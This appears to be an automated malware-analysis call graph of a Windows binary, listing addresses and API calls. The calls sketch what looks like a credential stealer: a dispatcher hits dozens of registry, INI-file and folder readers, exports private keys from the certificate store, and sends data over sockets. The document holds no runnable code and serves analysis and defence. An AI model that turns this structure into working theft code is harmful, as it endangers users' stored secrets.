8479 4027be 8476->8479 8477 40277e 8578 401e4c 8477->8578 8483 4027e5 8478->8483 8484 4027da DeleteFileA 8478->8484 8482 401422 WriteFile 8479->8482 8485 4027cc CloseHandle 8482->8485 8486 4018b8 LocalFree 8483->8486 8484->8483 8485->8478 8486->8467 8519 4018cf LocalAlloc 8487->8519 8489 403e00 8520 4018cf LocalAlloc 8489->8520 8491 403e0d 8521 4018cf LocalAlloc 8491->8521 8493 403e1a InternetCrackUrlA 8494 403e61 8493->8494 8499 403e67 8493->8499 8495 403e6c InternetCreateUrlA 8494->8495 8494->8499 8496 403e91 InternetCrackUrlA 8495->8496 8495->8499 8498 403ed2 8496->8498 8496->8499 8497 4018b8 LocalFree 8500 403f71 8497->8500 8498->8499 8501 403edd wsprintfA 8498->8501 8499->8497 8502 4018b8 LocalFree 8500->8502 8522 403800 socket 8501->8522 8504 403f79 8502->8504 8505 4018b8 LocalFree 8504->8505 8507 403f81 8505->8507 8519->8489 8520->8491 8521->8493 8523 403819 8522->8523 8524 40381b 8522->8524 8523->8499 8572->8458 8574 401e02 lstrlen lstrlen 8573->8574 8586 4018cf LocalAlloc 8574->8586 8577 401e31 lstrcpy lstrcat 8577->8477 8579 401e56 lstrlen lstrlen 8578->8579 8587 4018cf LocalAlloc 8579->8587 8582 401e85 lstrcpy lstrcat 8583 401ea2 8582->8583 8584 401eaa 8582->8584 8585 4018b8 LocalFree 8583->8585 8584->8476 8585->8584 8586->8577 8587->8582 8677 40fbbb 8678 40fbc3 8677->8678 8681 40f984 8678->8681 8680 40fbe9 8682 40f997 8681->8682 8683 40f998 GetPEB 8681->8683 8682->8680 8686 40f9ba 8683->8686 8684 40fa88 8684->8680 8686->8684 8768 40240a 8686->8768 8772 40c1ce 8686->8772 8776 40c34e 8686->8776 8780 40e0cd 8686->8780 8784 4063cc 8686->8784 8788 40614b 8686->8788 8800 405acb 8686->8800 8834 40504b 8686->8834 8862 409dcb 8686->8862 8877 405cca 8686->8877 8915 40e449 8686->8915 8925 405e49 8686->8925 8933 409d44 8686->8933 8941 40eb43 8686->8941 8949 408c43 8686->8949 8982 4053c3 8686->8982 9009 40a1c2 8686->9009 9019 40f740 8686->9019 9045 407086 8686->9045 9087 40d3be 8686->9087 9109 40c2bb 8686->9109 9113 40e4b7 8686->9113 9117 40c230 8686->9117 9129 40eeae 8686->9129 9135 40aaa8 8686->9135 9143 40dc27 8686->9143 9147 408124 8686->9147 9153 40c823 8686->9153 9184 40a0a2 8686->9184 9197 40d9a1 8686->9197 9207 4069a0 8686->9207 9211 407e20 8686->9211 9217 40f81f 8686->9217 9229 40901f 8686->9229 9237 40c31d 8686->9237 9241 40a21c 8686->9241 9245 40cf9b 8686->9245 9255 40de9b 8686->9255 9261 40e89b 8686->9261 9265 40d796 8686->9265 9269 40a016 8686->9269 9283 406915 8686->9283 9293 404a95 8686->9293 9307 406d14 8686->9307 9311 40f093 8686->9311 9325 40b012 8686->9325 9329 409f8f 8686->9329 9337 40c98a 8686->9337 9347 407589 8686->9347 9353 409f08 8686->9353 9361 40e907 8686->9361 9387 40df62 8686->9387 9397 407685 8686->9397 9407 405f04 8686->9407 9413 409e81 8686->9413 9421 407a7f 8686->9421 9441 40e5ff 8686->9441 9445 40c1ff 8686->9445 9449 4045fd 8686->9449 9475 40cb74 8686->9475 9489 40c6f0 8686->9489 9497 40cbee 8686->9497 9501 4055ed 8686->9501 9541 40c2ec 8686->9541 9545 40c769 8686->9545 9553 407e69 8686->9553 9563 406ce3 8686->9563 9567 40a257 8686->9567 9573 406ae0 8686->9573 9577 40735e 8686->9577 9583 40665e 8686->9583 9587 40dbde 8686->9587 9593 4069db 8686->9593 9605 40d35a 8686->9605 9615 40ca59 8686->9615 9638 40e8d1 8686->9638 9642 407754 8686->9642 9650 407853 8686->9650 9664 407ed1 8686->9664 9668 408f4f 8686->9668 9680 404c51 8686->9680 9752 40e5ce 8686->9752 8769 402413 8768->8769 8770 40241f 8769->8770 8771 4018b8 LocalFree 8769->8771 8770->8686 8771->8769 8773 40c1e0 8772->8773 9756 40c13d 8773->9756 8777 40c360 8776->8777 8778 40c13d 46 API calls 8777->8778 8779 40c370 8778->8779 8779->8686 8781 40e0df 8780->8781 8782 40c13d 46 API calls 8781->8782 8783 40e0ef 8782->8783 8783->8686 8785 4063de 8784->8785 10037 4061e4 RegOpenKeyA 8785->10037 8787 4063ee 8787->8686 8789 40615d 8788->8789 8790 401d71 6 API calls 8789->8790 8793 406179 8790->8793 8791 406194 8792 401d71 6 API calls 8791->8792 8797 4061ad 8792->8797 8793->8791 8794 4018b8 LocalFree 8793->8794 8794->8791 8795 4061c8 10048 405f4c RegOpenKeyA 8795->10048 8797->8795 8799 4018b8 LocalFree 8797->8799 8798 4061d5 8798->8686 8799->8795 8801 405add 8800->8801 10058 4059a4 8801->10058 10141 4015f0 8834->10141 8836 405060 GetWindowsDirectoryA 8837 40507c 8836->8837 8838 40511f 8836->8838 8837->8838 8840 401df8 5 API calls 8837->8840 8839 401eb1 7 API calls 8838->8839 8841 405126 8839->8841 8842 405098 GetPrivateProfileStringA 8840->8842 8843 405146 8841->8843 8844 401e4c 6 API calls 8841->8844 8845 4050c8 8842->8845 8846 4050d9 GetPrivateProfileStringA 8842->8846 10171 404fff 8843->10171 8848 405135 8844->8848 8849 404e73 31 API calls 8845->8849 8851 405103 8846->8851 8852 405114 8846->8852 10143 404e73 8848->10143 8849->8846 8855 404e73 31 API calls 8851->8855 8856 4018b8 LocalFree 8852->8856 8854 404fff 36 API calls 8858 405164 8854->8858 8855->8852 8856->8838 8860 404fff 36 API calls 8858->8860 8859 4018b8 LocalFree 8859->8843 8863 409de0 8862->8863 8864 401eb1 7 API calls 8863->8864 8865 409dea 8864->8865 8866 409e12 GetCurrentDirectoryA 8865->8866 8868 401e4c 6 API calls 8865->8868 10188 409c3c StrStrIA 8866->10188 8870 409df9 8868->8870 10185 404351 8870->10185 8871 409c3c 83 API calls 8873 409e66 SetCurrentDirectoryA 8871->8873 8876 409e7d 8873->8876 8875 4018b8 LocalFree 8875->8866 8876->8686 8878 405cdc 8877->8878 8879 401d71 6 API calls 8878->8879 8880 405cf6 8879->8880 8881 405d0e 8880->8881 8882 40406c 16 API calls 8880->8882 8883 401d71 6 API calls 8881->8883 8884 405d09 8882->8884 8885 405d25 8883->8885 8886 4018b8 LocalFree 8884->8886 8887 405d3d 8885->8887 8889 40406c 16 API calls 8885->8889 8886->8881 8888 401d71 6 API calls 8887->8888 8893 405d54 8888->8893 8890 405d38 8889->8890 8891 4018b8 LocalFree 8890->8891 8891->8887 8892 405d67 8895 401d71 6 API calls 8892->8895 8893->8892 10422 405c6c 8893->10422 8897 405d7e 8895->8897 8899 405d91 8897->8899 8901 405c6c 41 API calls 8897->8901 8898 4018b8 LocalFree 8898->8892 8900 401d71 6 API calls 8899->8900 8902 405da8 8900->8902 8903 405d8c 8901->8903 8904 405dbb 8902->8904 8906 405c6c 41 API calls 8902->8906 8905 4018b8 LocalFree 8903->8905 10413 405c9d 8904->10413 8905->8899 8908 405db6 8906->8908 8910 4018b8 LocalFree 8908->8910 8910->8904 8916 40e45b 8915->8916 10427 40e237 RegOpenKeyA 8916->10427 8919 40e237 11 API calls 8920 40e483 8919->8920 10460 40e380 RegOpenKeyA 8920->10460 8923 40e380 31 API calls 8924 40e4a8 8923->8924 8924->8686 8926 405e5b 8925->8926 10497 405de8 8926->10497 8929 405de8 46 API calls 8930 405e72 8929->8930 8931 405de8 46 API calls 8930->8931 8932 405e7c 8931->8932 8932->8686 8934 4015f0 8933->8934 8935 409d59 GetCurrentDirectoryA 8934->8935 8936 409c3c 83 API calls 8935->8936 8937 409d94 8936->8937 8938 409c3c 83 API calls 8937->8938 8939 409db0 SetCurrentDirectoryA 8938->8939 8940 409dc7 8939->8940 8940->8686 8942 40eb55 8941->8942 10510 40e9f9 8942->10510 8945 40e9f9 49 API calls 8946 40eb7d 8945->8946 10527 40439c 8946->10527 8950 408c55 8949->8950 10544 408c21 8950->10544 8953 408c21 49 API calls 8954 408c6c 8953->8954 8955 408c21 49 API calls 8954->8955 8956 408c76 8955->8956 8957 401d71 6 API calls 8956->8957 8958 408c8d 8957->8958 8959 408c91 8958->8959 8960 408ca5 8958->8960 10551 408961 8959->10551 8962 401d71 6 API calls 8960->8962 8963 408cbc 8962->8963 8965 408cc0 8963->8965 8966 408cd4 8963->8966 8968 408961 38 API calls 8965->8968 8969 401d71 6 API calls 8966->8969 8967 4018b8 LocalFree 8967->8960 8970 408ccf 8968->8970 8971 408ce7 8969->8971 8972 4018b8 LocalFree 8970->8972 8973 408d0f 8971->8973 8974 40242b 9 API calls 8971->8974 8972->8966 8973->8686 8986 4053d6 8982->8986 8983 4053e4 StrStrIA 8983->8986 8984 40541f 10679 40531a 8984->10679 8986->8983 8986->8984 8987 40242b 9 API calls 8986->8987 8994 4018b8 LocalFree 8986->8994 10713 4051e3 8986->10713 8987->8986 8989 40531a 34 API calls 8990 405433 8989->8990 8992 40531a 34 API calls 8990->8992 8993 40543d 8992->8993 8995 40531a 34 API calls 8993->8995 8994->8986 8996 405447 8995->8996 10708 405199 8996->10708 8999 405199 6 API calls 9000 405461 8999->9000 9010 40a1d4 9009->9010 9011 401d71 6 API calls 9010->9011 9013 40a1ea 9011->9013 9012 40a20d 9012->8686 9013->9012 9014 40242b 9 API calls 9013->9014 9015 40a1f4 9014->9015 9016 404351 41 API calls 9015->9016 9017 40a208 9016->9017 9018 4018b8 LocalFree 9017->9018 9018->9012 9020 40f752 9019->9020 10740 40f6ee 9020->10740 9025 401df8 5 API calls 9026 40f77f 9025->9026 10754 40f3ac RegOpenKeyA 9026->10754 9029 4018b8 LocalFree 9030 40f799 9029->9030 9031 401d71 6 API calls 9030->9031 9032 40f7af 9031->9032 9033 40f7d3 9032->9033 9034 401e4c 6 API calls 9032->9034 9035 40f30d 23 API calls 9033->9035 9037 40f7be 9034->9037 9036 40f7e6 9035->9036 9038 40f3ac 26 API calls 9036->9038 9039 40f30d 23 API calls 9037->9039 9041 40f7ce 9039->9041 9046 407098 9045->9046 10826 406d4f RegOpenKeyA 9046->10826 9049 401d71 6 API calls 9050 4070bf 9049->9050 9051 4070dd 9050->9051 9052 401e4c 6 API calls 9050->9052 9053 401eb1 7 API calls 9051->9053 9054 4070ce 9052->9054 9055 4070e4 9053->9055 9056 406fbb 20 API calls 9054->9056 9057 40710d 9055->9057 9060 401e4c 6 API calls 9055->9060 9059 4070d8 9056->9059 9058 401eb1 7 API calls 9057->9058 9062 407114 9058->9062 9063 4018b8 LocalFree 9059->9063 9061 4070f3 9060->9061 9064 401e4c 6 API calls 9061->9064 9065 40713d 9062->9065 9068 401e4c 6 API calls 9062->9068 9063->9051 9066 4070fe 9064->9066 9067 401eb1 7 API calls 9065->9067 10837 406fbb 9066->10837 9070 407144 9067->9070 9071 407123 9068->9071 9073 40716d 9070->9073 9076 401e4c 6 API calls 9070->9076 9074 401e4c 6 API calls 9071->9074 9072 407108 9073->8686 9077 40712e 9074->9077 9078 407153 9076->9078 9079 406fbb 20 API calls 9077->9079 9080 401e4c 6 API calls 9078->9080 9081 407138 9079->9081 9089 40d3d2 9087->9089 9088 40d5af 9088->8686 9089->9088 9090 40d43d CertOpenSystemStoreA 9089->9090 9090->9088 9098 40d457 9090->9098 9091 40d459 CertEnumCertificatesInStore 9092 40d469 CertCloseStore 9091->9092 9091->9098 9092->9088 9094 40d487 lstrcmp 9094->9098 9096 40d4be lstrcmp 9097 40d4d3 CryptAcquireCertificatePrivateKey 9096->9097 9096->9098 9097->9098 9099 40d4f0 CryptGetUserKey 9097->9099 9098->9091 9098->9094 9098->9096 9100 4018b8 LocalFree 9098->9100 10863 4018cf LocalAlloc 9098->10863 9101 40d504 CryptExportKey 9099->9101 9102 40d57c CryptReleaseContext 9099->9102 9100->9098 9103 40d573 CryptDestroyKey 9101->9103 9104 40d51d 9101->9104 9102->9098 9103->9102 10864 4018cf LocalAlloc 9104->10864 9106 40d525 CryptExportKey 9107 40d542 9106->9107 9108 4018b8 LocalFree 9107->9108 9108->9103 9110 40c2cd 9109->9110 9111 40c13d 46 API calls 9110->9111 9112 40c2dd 9111->9112 9112->8686 9114 40e4c9 9113->9114 9115 40c13d 46 API calls 9114->9115 9116 40e4d9 9115->9116 9116->8686 9118 40c242 9117->9118 9119 40c13d 46 API calls 9118->9119 9120 40c252 9119->9120 9121 401d71 6 API calls 9120->9121 9122 40c269 9121->9122 9123 4041a6 41 API calls 9122->9123 9124 40c2ac 9122->9124 9125 40c28a 9123->9125 9124->8686 9126 4041a6 41 API calls 9125->9126 9127 40c2a4 9126->9127 9128 4018b8 LocalFree 9127->9128 9128->9124 9130 40eec0 9129->9130 10865 40eba3 RegOpenKeyA 9130->10865 9133 40eba3 18 API calls 9134 40eee8 9133->9134 9134->8686 9138 40aaba 9135->9138 9140 40a45e CoTaskMemFree 9138->9140 9142 40aae0 9138->9142 9140->9142 9141 40ab15 9141->8686 10877 40a875 CoCreateInstance 9142->10877 9144 40dc39 9143->9144 9145 40439c 46 API calls 9144->9145 9146 40dc53 9145->9146 9146->8686 9148 408136 9147->9148 10925 407f0c RegOpenKeyA 9148->10925 9151 407f0c 14 API calls 9152 40815e 9151->9152 9152->8686 9161 40c836 9153->9161 9154 40c844 StrStrIA 9154->9161 9155 40c88b 9156 40439c 46 API calls 9155->9156 9158 40c8a2 9156->9158 9157 40242b 9 API calls 9157->9161 9159 401d71 6 API calls 9158->9159 9160 40c8b9 9159->9160 9162 401d71 6 API calls 9160->9162 9161->9154 9161->9155 9161->9157 9163 404351 41 API calls 9161->9163 9166 4018b8 LocalFree 9161->9166 9164 40c8d3 9162->9164 9163->9161 9165 401d71 6 API calls 9164->9165 9167 40c8ed 9165->9167 9166->9161 9168 401d71 6 API calls 9167->9168 9172 40c909 9168->9172 9169 40c94c 9170 4018b8 LocalFree 9169->9170 9171 40c962 9170->9171 9173 4018b8 LocalFree 9171->9173 9172->9169 9176 4015cb lstrlen 9172->9176 9174 40c96a 9173->9174 9178 40c936 9176->9178 9180 4015cb lstrlen 9178->9180 9181 40c941 9180->9181 9183 4015cb lstrlen 9181->9183 9183->9169 9185 40a0b6 9184->9185 9186 401eb1 7 API calls 9185->9186 9187 40a0c0 9186->9187 9188 404351 41 API calls 9187->9188 9194 40a0dd 9187->9194 9191 40a0d8 9188->9191 9189 40a0ee StrStrIA 9189->9194 9190 40a133 9190->8686 9192 4018b8 LocalFree 9191->9192 9192->9194 9193 40242b 9 API calls 9193->9194 9194->9189 9194->9190 9194->9193 9195 404351 41 API calls 9194->9195 9196 4018b8 LocalFree 9194->9196 9195->9194 9196->9194 9198 40d9b3 9197->9198 10936 40d965 9198->10936 9201 40d965 46 API calls 9202 40d9ca 9201->9202 9203 40d965 46 API calls 9202->9203 9204 40d9d4 9203->9204 9205 40439c 46 API calls 9204->9205 9206 40d9eb 9205->9206 9206->8686 9208 4069b2 9207->9208 9209 40439c 46 API calls 9208->9209 9210 4069cc 9209->9210 9210->8686 9212 407e32 9211->9212 10945 407bba RegOpenKeyA 9212->10945 9215 407bba 14 API calls 9216 407e5a 9215->9216 9216->8686 9218 4015f0 9217->9218 9219 40f834 GetCurrentDirectoryA 9218->9219 9220 409c3c 83 API calls 9219->9220 9221 40f86f 9220->9221 9222 409c3c 83 API calls 9221->9222 9223 40f88b SetCurrentDirectoryA GetCurrentDirectoryA 9222->9223 9224 409c3c 83 API calls 9223->9224 9225 40f8cf 9224->9225 9226 409c3c 83 API calls 9225->9226 9227 40f8eb SetCurrentDirectoryA 9226->9227 9228 40f902 9227->9228 9228->8686 9230 409031 9229->9230 10956 408fd3 9230->10956 9233 408fd3 46 API calls 9234 409048 9233->9234 9235 408fd3 46 API calls 9234->9235 9236 409052 9235->9236 9236->8686 9238 40c32f 9237->9238 9239 40c13d 46 API calls 9238->9239 9240 40c33f 9239->9240 9240->8686 9242 40a22e 9241->9242 9243 40439c 46 API calls 9242->9243 9244 40a248 9243->9244 9244->8686 9246 40cfad 9245->9246 10967 40ccda 9246->10967 9249 401eb1 7 API calls 9250 40cfbf 9249->9250 9251 40cfe1 9250->9251 9252 4041a6 41 API calls 9250->9252 9251->8686 9253 40cfdc 9252->9253 9254 4018b8 LocalFree 9253->9254 9254->9251 9256 40dead 9255->9256 10987 40dc62 RegOpenKeyA 9256->10987 9259 40dc62 14 API calls 9260 40ded5 9259->9260 9260->8686 9262 40e8ad 9261->9262 10998 40e85d 9262->10998 9264 40e8c2 9264->8686 9266 40d7a8 9265->9266 11021 40d5c0 RegOpenKeyA 9266->11021 9268 40d7b8 9268->8686 9270 40a028 9269->9270 9271 401d71 6 API calls 9270->9271 9272 40a042 9271->9272 9273 40a05f 9272->9273 9274 404351 41 API calls 9272->9274 9275 401d71 6 API calls 9273->9275 9276 40a05a 9274->9276 9277 40a076 9275->9277 9278 4018b8 LocalFree 9276->9278 9279 40a093 9277->9279 9280 404351 41 API calls 9277->9280 9278->9273 9279->8686 9281 40a08e 9280->9281 9282 4018b8 LocalFree 9281->9282 9282->9279 9284 406927 9283->9284 9285 40439c 46 API calls 9284->9285 9286 406941 9285->9286 9287 401d71 6 API calls 9286->9287 9291 40695a 9287->9291 9288 406984 11032 40668f RegOpenKeyA 9288->11032 9290 406991 9290->8686 9291->9288 9292 4018b8 LocalFree 9291->9292 9292->9288 9294 404aa7 9293->9294 11044 40491b RegOpenKeyA 9294->11044 9297 40491b 14 API calls 9298 404ac4 9297->9298 9299 40491b 14 API calls 9298->9299 9300 404ad1 9299->9300 11055 40480d RegOpenKeyA 9300->11055 9303 40480d 10 API calls 9304 404aeb 9303->9304 9305 40480d 10 API calls 9304->9305 9306 404af8 9305->9306 9306->8686 9308 406d26 9307->9308 9309 40439c 46 API calls 9308->9309 9310 406d40 9309->9310 9310->8686 9312 40f0a5 9311->9312 9313 40439c 46 API calls 9312->9313 9314 40f0bf 9313->9314 9315 40439c 46 API calls 9314->9315 9316 40f0d6 9315->9316 9317 40439c 46 API calls 9316->9317 9318 40f0ed 9317->9318 9319 40439c 46 API calls 9318->9319 9320 40f104 9319->9320 11064 40ef6c 9320->11064 9326 40b024 9325->9326 11105 40aed7 RegOpenKeyA 9326->11105 9328 40b034 9328->8686 9330 4015f0 9329->9330 9331 409fa4 GetCurrentDirectoryA 9330->9331 9332 409c3c 83 API calls 9331->9332 9333 409fdf 9332->9333 9334 409c3c 83 API calls 9333->9334 9335 409ffb SetCurrentDirectoryA 9334->9335 9336 40a012 9335->9336 9336->8686 9338 40c99c 9337->9338 9339 401d71 6 API calls 9338->9339 9340 40c9b2 9339->9340 9341 40c9d9 9340->9341 9342 40242b 9 API calls 9340->9342 9341->8686 9343 40c9bc 9342->9343 9343->9341 9344 404351 41 API calls 9343->9344 9345 40c9d4 9344->9345 9346 4018b8 LocalFree 9345->9346 9346->9341 9348 40759b 9347->9348 11193 4073a7 RegOpenKeyA 9348->11193 9351 4073a7 14 API calls 9352 4075c3 9351->9352 9352->8686 9354 4015f0 9353->9354 9355 409f1d GetCurrentDirectoryA 9354->9355 9356 409c3c 83 API calls 9355->9356 9357 409f58 9356->9357 9358 409c3c 83 API calls 9357->9358 9359 409f74 SetCurrentDirectoryA 9358->9359 9360 409f8b 9359->9360 9360->8686 9362 40e919 9361->9362 9363 401d71 6 API calls 9362->9363 9364 40e933 9363->9364 9365 40e950 9364->9365 9367 404351 41 API calls 9364->9367 9366 401d71 6 API calls 9365->9366 9369 40e966 9366->9369 9368 40e94b 9367->9368 9370 4018b8 LocalFree 9368->9370 9371 40e983 9369->9371 9372 404351 41 API calls 9369->9372 9370->9365 9373 401d71 6 API calls 9371->9373 9374 40e97e 9372->9374 9375 40e99a 9373->9375 9376 4018b8 LocalFree 9374->9376 9377 40e9b7 9375->9377 9379 404351 41 API calls 9375->9379 9376->9371 9378 401d71 6 API calls 9377->9378 9380 40e9cd 9378->9380 9381 40e9b2 9379->9381 9382 40e9ea 9380->9382 9384 404351 41 API calls 9380->9384 9383 4018b8 LocalFree 9381->9383 9382->8686 9383->9377 9385 40e9e5 9384->9385 9386 4018b8 LocalFree 9385->9386 9386->9382 9388 40df74 9387->9388 9389 401d71 6 API calls 9388->9389 9390 40df8e 9389->9390 9391 40dfab 9390->9391 9392 404351 41 API calls 9390->9392 9393 40439c 46 API calls 9391->9393 9394 40dfa6 9392->9394 9396 40dfc2 9393->9396 9395 4018b8 LocalFree 9394->9395 9395->9391 9396->8686 9398 407697 9397->9398 11204 4075d2 RegOpenKeyA 9398->11204 9401 4075d2 9 API calls 9402 4076bf 9401->9402 9403 4075d2 9 API calls 9402->9403 9404 4076d2 9403->9404 9405 4075d2 9 API calls 9404->9405 9406 4076e4 9405->9406 9406->8686 9408 405f16 9407->9408 11212 405e8b 9408->11212 9411 405e8b 46 API calls 9412 405f3d 9411->9412 9412->8686 9414 4015f0 9413->9414 9415 409e96 GetCurrentDirectoryA 9414->9415 9416 409c3c 83 API calls 9415->9416 9417 409ed1 9416->9417 9418 409c3c 83 API calls 9417->9418 9419 409eed SetCurrentDirectoryA 9418->9419 9420 409f04 9419->9420 9420->8686 9431 407a93 9421->9431 9422 407b66 11227 407a33 9422->11227 9423 407aab StrStrA 9424 407b08 StrStrIA 9423->9424 9423->9431 9424->9431 9426 407ac4 lstrlen 9429 40242b 9 API calls 9426->9429 9428 40242b 9 API calls 9428->9431 9429->9431 9430 407a33 46 API calls 9432 407b7a 9430->9432 9431->9422 9431->9423 9431->9426 9431->9428 9436 404351 41 API calls 9431->9436 9439 4018b8 LocalFree 9431->9439 9433 407a33 46 API calls 9432->9433 9434 407b84 9433->9434 11238 4078c8 RegOpenKeyA 9434->11238 9436->9431 9438 4078c8 48 API calls 9440 407ba9 9438->9440 9439->9431 9440->8686 9442 40e611 9441->9442 9443 40439c 46 API calls 9442->9443 9444 40e62b 9443->9444 9444->8686 9446 40c211 9445->9446 9447 40c13d 46 API calls 9446->9447 9448 40c221 9447->9448 9448->8686 9450 404614 9449->9450 9451 404635 GetVersionExA 9450->9451 9452 404657 9451->9452 11249 40446a GetModuleHandleA 9452->11249 9454 40469d 11255 4018cf LocalAlloc 9454->11255 9456 4046b0 GetLocaleInfoA 11256 40159f 9456->11256 9458 4046df GetLocaleInfoA 9459 404708 9458->9459 11258 4044d2 9459->11258 9461 40470d 11266 40456c 9461->11266 9476 40cb86 9475->9476 9477 401d71 6 API calls 9476->9477 9478 40cb9c 9477->9478 9479 40cba0 StrStrIA 9478->9479 9480 40cbdf 9478->9480 9481 40cbb4 9479->9481 9482 40cbd7 9479->9482 9480->8686 9484 40242b 9 API calls 9481->9484 9483 4018b8 LocalFree 9482->9483 9483->9480 9485 40cbbc 9484->9485 9486 4041a6 41 API calls 9485->9486 9487 40cbd2 9486->9487 9488 4018b8 LocalFree 9487->9488 9488->9482 9490 40c702 9489->9490 11297 40c67f 9490->11297 9493 40c67f 46 API calls 9494 40c719 9493->9494 9495 40c67f 46 API calls 9494->9495 9496 40c723 9495->9496 9496->8686 9498 40cc00 9497->9498 9499 40439c 46 API calls 9498->9499 9500 40cc1a 9499->9500 9500->8686 9502 4055ff 9501->9502 11314 4054c8 9502->11314 9505 4054c8 24 API calls 9506 405632 9505->9506 9507 4054c8 24 API calls 9506->9507 9508 40564a 9507->9508 9509 4054c8 24 API calls 9508->9509 9510 405662 9509->9510 9511 4054c8 24 API calls 9510->9511 9512 40567a 9511->9512 9513 4054c8 24 API calls 9512->9513 9514 405692 9513->9514 9515 4054c8 24 API calls 9514->9515 9516 4056aa 9515->9516 9517 4054c8 24 API calls 9516->9517 9542 40c2fe 9541->9542 9543 40c13d 46 API calls 9542->9543 9544 40c30e 9543->9544 9544->8686 9546 40c77b 9545->9546 11361 40c732 9546->11361 9549 40c732 46 API calls 9550 40c792 9549->9550 9551 40c732 46 API calls 9550->9551 9552 40c79c 9551->9552 9552->8686 9554 4015f0 9553->9554 9555 407e7e GetWindowsDirectoryA 9554->9555 9556 407e96 9555->9556 9557 407ec2 9555->9557 9556->9557 9558 401df8 5 API calls 9556->9558 9557->8686 9559 407eae 9558->9559 9560 40406c 16 API calls 9559->9560 9561 407ebd 9560->9561 9562 4018b8 LocalFree 9561->9562 9562->9557 9564 406cf5 9563->9564 11370 406b1b RegOpenKeyA 9564->11370 9566 406d05 9566->8686 9568 40a269 9567->9568 9569 40439c 46 API calls 9568->9569 9570 40a283 9569->9570 9571 40439c 46 API calls 9570->9571 9572 40a29a 9571->9572 9572->8686 9574 406af2 9573->9574 9575 40439c 46 API calls 9574->9575 9576 406b0c 9575->9576 9576->8686 9578 407370 9577->9578 11380 40717c RegOpenKeyA 9578->11380 9581 40717c 14 API calls 9582 407398 9581->9582 9582->8686 9584 406670 9583->9584 11391 4063fd RegOpenKeyA 9584->11391 9586 406680 9586->8686 9588 40dbf0 9587->9588 11402 40d9fa RegOpenKeyA 9588->11402 9591 40d9fa 14 API calls 9592 40dc18 9591->9592 9592->8686 9594 4069ed 9593->9594 9595 40439c 46 API calls 9594->9595 9596 406a0e 9595->9596 9597 401d71 6 API calls 9596->9597 9598 406a25 9597->9598 9599 406a4d 9598->9599 9600 401e4c 6 API calls 9598->9600 9599->8686 9601 406a34 9600->9601 9602 404351 41 API calls 9601->9602 9603 406a48 9602->9603 9604 4018b8 LocalFree 9603->9604 9604->9599 9606 40d36c 9605->9606 11413 40d072 RegOpenKeyA 9606->11413 9609 40d072 16 API calls 9610 40d394 9609->9610 11425 40d2cb 9610->11425 9613 40d2cb 21 API calls 9614 40d3af 9613->9614 9614->8686 9624 40ca6c 9615->9624 9616 40caba 9618 401eb1 7 API calls 9616->9618 9617 40ca7a StrStrIA 9617->9624 9619 40cac1 9618->9619 9621 40cae9 9619->9621 9622 401e4c 6 API calls 9619->9622 9620 40242b 9 API calls 9620->9624 9623 401eb1 7 API calls 9621->9623 9625 40cad0 9622->9625 9626 40caf0 9623->9626 9624->9616 9624->9617 9624->9620 9627 404351 41 API calls 9624->9627 9632 4018b8 LocalFree 9624->9632 9628 404351 41 API calls 9625->9628 9629 40cb18 9626->9629 9631 401e4c 6 API calls 9626->9631 9627->9624 9630 40cae4 9628->9630 9629->8686 9633 4018b8 LocalFree 9630->9633 9634 40caff 9631->9634 9632->9624 9633->9621 9635 404351 41 API calls 9634->9635 9636 40cb13 9635->9636 9637 4018b8 LocalFree 9636->9637 9637->9629 9639 40e8e3 9638->9639 9640 40e85d 46 API calls 9639->9640 9641 40e8f8 9640->9641 9641->8686 9643 407766 9642->9643 11435 4076f3 9643->11435 9646 4076f3 46 API calls 9647 40777d 9646->9647 9648 4076f3 46 API calls 9647->9648 9649 407787 9648->9649 9649->8686 9651 407865 9650->9651 11448 407796 9651->11448 9654 407796 29 API calls 9655 407880 9654->9655 9656 407796 29 API calls 9655->9656 9657 40788c 9656->9657 9658 407796 29 API calls 9657->9658 9659 40789b 9658->9659 9660 407796 29 API calls 9659->9660 9661 4078aa 9660->9661 9662 407796 29 API calls 9661->9662 9663 4078b9 9662->9663 9663->8686 9665 407ee3 9664->9665 9666 40439c 46 API calls 9665->9666 9667 407efd 9666->9667 9667->8686 9669 408f61 9668->9669 9670 40439c 46 API calls 9669->9670 9671 408f7b 9670->9671 11479 408d1e RegOpenKeyA 9671->11479 9674 408d1e 14 API calls 9675 408fa0 9674->9675 11490 408e0d RegOpenKeyA 9675->11490 9678 408e0d 53 API calls 9679 408fc4 9678->9679 9679->8686 9681 404c63 9680->9681 11509 4018cf LocalAlloc 9681->11509 9683 404c70 GetWindowsDirectoryA 9684 404c84 9683->9684 9685 404c98 9683->9685 9684->9685 9687 404c8b 9684->9687 9686 4018b8 LocalFree 9685->9686 9688 404c96 9686->9688 11510 404b1e 9687->11510 9690 401eb1 7 API calls 9688->9690 9691 404ca7 9690->9691 9692 404b1e 28 API calls 9691->9692 9693 404cb0 9692->9693 9694 401eb1 7 API calls 9693->9694 9695 404cb7 9694->9695 9696 404ccf 9695->9696 9697 401e4c 6 API calls 9695->9697 9698 401eb1 7 API calls 9696->9698 9699 404cc6 9697->9699 9700 404cd6 9698->9700 9702 404b1e 28 API calls 9699->9702 9701 404cee 9700->9701 9703 401e4c 6 API calls 9700->9703 9704 401eb1 7 API calls 9701->9704 9702->9696 9705 404ce5 9703->9705 9753 40e5e0 9752->9753 11565 40e566 9753->11565 9755 40e5f0 9755->8686 9769 40c107 9756->9769 9759 40c107 46 API calls 9760 40c16e 9759->9760 9761 40c107 46 API calls 9760->9761 9762 40c185 9761->9762 9763 40c107 46 API calls 9762->9763 9764 40c19c 9763->9764 9765 40c107 46 API calls 9764->9765 9766 40c1b3 9765->9766 9767 40c107 46 API calls 9766->9767 9778 401eb1 9769->9778 9772 40c139 9772->9759 9773 401e4c 6 API calls 9774 40c11f 9773->9774 9787 4041a6 9774->9787 9777 4018b8 LocalFree 9777->9772 9811 4018cf LocalAlloc 9778->9811 9780 401ec2 9781 401ed0 SHGetFolderPathA 9780->9781 9782 401ece 9780->9782 9781->9782 9783 401f21 9781->9783 9784 4018b8 LocalFree 9782->9784 9783->9772 9783->9773 9785 401eee 9784->9785 9785->9783 9812 401d71 9785->9812 9788 4041c5 9787->9788 9790 4041c0 9787->9790 9789 4018b8 LocalFree 9788->9789 9791 40434d 9789->9791 9790->9788 9792 4041e5 9790->9792 9793 4041d6 9790->9793 9791->9777 9795 401df8 5 API calls 9792->9795 9794 401df8 5 API calls 9793->9794 9796 4041e3 9794->9796 9795->9796 9797 404209 FindFirstFileA 9796->9797 9797->9788 9806 404228 9797->9806 9808 4018b8 LocalFree 9806->9808 9811->9780 9813 401d7d 9812->9813 9816 401c8d 9813->9816 9817 401c9b RegOpenKeyExA 